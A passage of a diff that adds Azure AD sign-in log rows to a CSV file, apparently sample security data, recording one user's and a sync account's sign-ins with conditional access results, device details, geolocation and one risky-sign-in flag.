-47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,3a4d127f-5a89-4252-9f54-d79d7fdd0700,SigninLogs,Sucess,-20.54751015,-47.4056282
+1390,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:02.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b6597a7e-d75e-48dd-bd43-db6abaea4624,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:02,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",cbcd7f19-25f4-4cfd-824c-94dc62040600,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,cbcd7f19-25f4-4cfd-824c-94dc62040600,SigninLogs,Sucess,-20.54751015,-47.4056282
+1391,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:28.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f940753c-6557-400b-9683-1256a5cff45c,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:02,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",92c2001d-49e6-496a-951e-7f191b920700,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,92c2001d-49e6-496a-951e-7f191b920700,SigninLogs,Sucess,-20.54751015,-47.4056282
+1392,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:01.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ba5c0e21-daef-4191-9706-a94dfa56e334,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 09:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",c3a7ae11-3090-46d7-95b6-d20554ef0800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,c3a7ae11-3090-46d7-95b6-d20554ef0800,SigninLogs,Sucess,36.6404686,-78.26995087
+1393,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,53:13.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,85e4c9c1-85ec-43a1-aff8-92f658c91130,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,O365 Suite UX,4345a7b9-9a63-4910-a426-35363201d503,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:53,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",d3a3c86e-d6a1-4323-9bc0-1a26cc700600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,low,atRisk,medium,"[
+  ""anonymizedIPAddress""
+]",{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,d3a3c86e-d6a1-4323-9bc0-1a26cc700600,SigninLogs,Sucess,34.06555176,-118.2405396
+1394,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:49.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4b375b9c-e707-4246-a4ed-f9a01ac4d625,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",22fd8c7c-75eb-4549-80fa-1727fc510700,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,22fd8c7c-75eb-4549-80fa-1727fc510700,SigninLogs,Sucess,-20.54751015,-47.4056282
+1395,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:50.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e9002f8a-5390-45b8-ae37-213cf210223c,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",92c2001d-49e6-496a-951e-7f19a28f0700,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,92c2001d-49e6-496a-951e-7f19a28f0700,SigninLogs,Sucess,-20.54751015,-47.4056282
+1396,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:03.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c6547365-18ad-4654-a232-c54946b75615,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Microsoft Teams,1fec8e78-bce4-4aaf-ab1b-5451cc387264,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:32,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'IE 7.0', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",368167e5-753b-476f-b20c-ef023b500500,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Teams Services,368167e5-753b-476f-b20c-ef023b500500,SigninLogs,Sucess,50.6406517,5.572050095
+1397,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:56.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e3337d53-73c2-4503-839f-19840413cacf,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': 